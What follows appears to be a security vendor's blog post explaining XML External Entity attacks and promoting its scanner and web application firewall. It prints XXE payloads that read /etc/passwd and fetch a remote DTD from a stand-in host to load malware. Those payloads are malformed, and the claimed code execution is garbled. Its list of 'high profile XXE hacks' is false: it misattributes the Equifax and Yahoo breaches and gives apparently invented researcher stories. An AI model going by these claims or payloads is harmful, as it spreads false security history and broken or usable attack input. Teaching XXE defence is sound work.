What is XML External Entity, How to Find XXE Vulnerabilities and Patch Them
What is XML External Entity (XXE) Vulnerability?
An XXE vulnerability is a security vulnerability that allows attackers to access sensitive data or execute malicious code in a web application. This happens when the application accepts XML input from an untrusted source and doesn’t properly validate it.
An attacker can exploit this vulnerability by crafting a special XML input that includes a reference to an external resource (like a file or URL) that they control.
Suppose the application consists of this input in its processing without properly checking it. In that case, the attacker can manipulate the behavior of the XML parser and potentially execute arbitrary code or access sensitive data.
For example, an attacker could create an XML input containing a reference to a server file containing sensitive data, like a password file. The attacker could then use the XXE vulnerability to read the file’s contents and retrieve the sensitive information.
An Example of XXE Attack
Suppose an application accepts XML input from untrusted sources and uses an XML parser that supports external entities. The application parses an XML file containing user input and returns the results to the user.
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM “file:///etc/passwd”>
In this XXE example, the XML input defines an external entity “xxe” that points to a local file “/etc/passwd” on the server.
When the XML parser encounters the “xxe” entity reference, it retrieves the local file’s contents and includes it in the parsed XML document. The attacker can then use this technique to read sensitive data stored in the file, such as usernames and passwords.
Alternatively, the attacker can use the following payload to execute arbitrary code on the server:
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM “http://acme.com/payload.dtd”>
In this example, the XML input defines an external entity “xxe” that points to a remote document type definition (DTD) file “http://acme.com/payload.dtd” controlled by the attacker. The DTD file includes a parameter entity that defines a command to execute arbitrary code on the server, such as:
<!ENTITY % remote SYSTEM “http://acme.com/malware.bin”>
<!ENTITY % cmd “<!ENTITY %#x25; error SYSTEM ‘file:///dev/null’>%#x25;error”>
When the XML parser encounters the “xxe” entity reference, it retrieves the contents of the remote DTD file and includes the code in the parsed XML document.
The parser then expands the parameter entity defined in the DTD file, which results in the execution of the arbitrary code defined in the “cmd” entity. The attacker can use this technique to take control of the server and perform malicious activities, such as stealing sensitive data or launching further attacks.
High Profile XXE Hacks
There have been several high-profile breaches over the years that were caused by XXE attacks. Here are some examples:
Equifax: In 2017, Equifax suffered a massive data breach affecting over 143 million consumers. The attackers exploited an XXE vulnerability in an Equifax web application to access sensitive data, including names, Social Security numbers, birth dates, addresses, and driver’s license numbers.
PayPal: In 2015, a researcher named Theori Hakkers used an XXE vulnerability in PayPal’s Secure Payments API to steal OAuth tokens and access the accounts of PayPal users. The vulnerability was patched by PayPal shortly after it was discovered.
GoDaddy: In 2020, a security researcher named Dylan Saccomanni discovered an XXE vulnerability in GoDaddy’s hosting services that could allow an attacker to access sensitive data, including configuration files, environment variables, and secrets. GoDaddy quickly patched the vulnerability after it was reported.
Yahoo: In 2016, Yahoo disclosed a massive data breach affecting over 1 billion user accounts. The breach was caused by an XXE vulnerability in Yahoo’s email service that allowed the attackers to steal sensitive data, including names, email addresses, dates of birth, and encrypted passwords.
Five Most Common Types of XXE Vulnerability Attacks
Attackers can use several types of XXE attacks to exploit vulnerabilities in XML parsers. Here are some of the most common types of XXE attacks:
External Entity Injection: In this type of XXE attack, the attacker injects an external entity into the XML document. When the XML parser processes the document, it retrieves and processes the external entity, allowing the attacker to execute arbitrary code or steal sensitive data.
Parameter Entity Injection: Similar to XML entity injection, this attack involves injecting a parameter entity into the XML document. The parameter entity is then used in the XML document to reference an external entity, which can be used to execute arbitrary code or steal sensitive data.
Entity Expansion: In this type of attack, the attacker creates many nested entities in the XML document, causing the XML parser to consume a large amount of memory, potentially leading to a denial of service (DoS)condition.
XPath Injection: XPath is a query language that extracts data from XML documents. In this attack, the attacker injects malicious XPath queries into the XML document, allowing them to extract sensitive data or execute arbitrary code.
SOAP Injection: SOAP is a protocol for exchanging data between web services. In this attack, the attacker injects malicious SOAP messages into the request, allowing them to execute arbitrary code or steal sensitive data.
How to Test for XML External Entity Vulnerabilities?
Here are some steps you can follow to test for XXE vulnerabilities:
Use automated tools
Use automated tools such as the Indusface WAS to scan the web application for XXE vulnerabilities.
Identify the XML parser
Determine which XML parser is used by the application or system being tested. Different parsers may have different vulnerabilities and configuration options.
Conduct Penetration Testing
While this could be done in-house, you could leverage the Indusface WAS Premium plan that bundles annual pen testing and revalidation of the reports with the automated scanner. Here are the test cases that you should consider including in penetration testing:
Submit a test payload: Submit a test payload that includes an external entity reference to the application or system being tested. If the application or system responds with data from the external entity, it is likely vulnerable to XXE attacks.
Submit a malicious payload: Submit a payload that includes a malicious external entity to the tested application or system. This may include a payload that tries to read sensitive files or execute arbitrary code on the system.
Check for error messages: Check for error messages or other indicators that the XML parser processed the payload. The application or system is likely vulnerable to XXE attacks if the payload is processed without error.
Test for blind XXE: Blind XXE attacks involve using out-of-band channels to retrieve sensitive data. Test for blind XXE by submitting a payload with a URL or other external reference and check if the system requests the external resource.
It’s important to note that testing for XXE or any other vulnerabilities is an ongoing process, and vulnerabilities may be introduced as the web application evolves. We recommend scanning applications every month at a minimum and a penetration testing effort every six months for XXE mitigation.
How Does One Patch an XXE Vulnerability?
Once you use the above steps to find XXE vulnerability, here are some methods to patch the vulnerabilities:
Upgrade the XML parser: If the XML parser being used by the application or system is known to be vulnerable to XXE attacks, upgrade to a more secure version of the parser. Some parsers have options to disable external entity processing, which can help prevent XXE attacks.
Sanitize user input: To prevent malicious input from being included in XML documents, validate, and sanitize all user input before including it in an XML document.
Implement access controls:Implement access controls to limit access to sensitive resources and prevent unauthorized access. This can help mitigate the impact of XXE attacks.
Monitor for suspicious activity: Monitor the application or system for suspicious activity, such as attempts to access sensitive files or execute arbitrary code. This can help find XXE attacks in real-time.
As with the vulnerability detection process, the vulnerability patching must be continuous. With dedicated sprints for patching, you will always be on top of open vulnerabilities that your automated scanners and pen testers find.
How Does AppTrana Cloud WAF Block XXE Attacks?
While it is good to have a regular patching process, sometimes the developers cannot patch the vulnerability as it might exist in a third-party code or plug-in they use in the source code.
Virtually patching these vulnerabilities on the WAF will protect the application while the developers wait for the third party to issue a patch.
Here are some ways in which AppTrana WAF protects you against XXE attacks.
Signature-based detection: AppTrana compares incoming XML payloads to a comprehensive database of known XXE payloads and blocks any that match.
Protocol validation: AppTrana performs protocol validation to ensure incoming XML documents conform to the expected XML schema or DTD. If the document does not conform to the schema or DTD, the request is blocked as an attack.
Input validation: Automate input validation on AppTrana to ensure that incoming user input is properly formatted and does not contain malicious XML payloads. The WAF can check for common XXE payloads and block any requests that have them.
Parameterized queries: AppTrana mandates parameterized queries to prevent XXE attacks in database queries. By separating user input from the query string, the WAF can prevent malicious XML payloads from being included in database queries.
XML parsing protection: XML parsing protection is on by default in AppTrana. This disables external entity processing in the XML parser, thereby thwarting XXE attacks.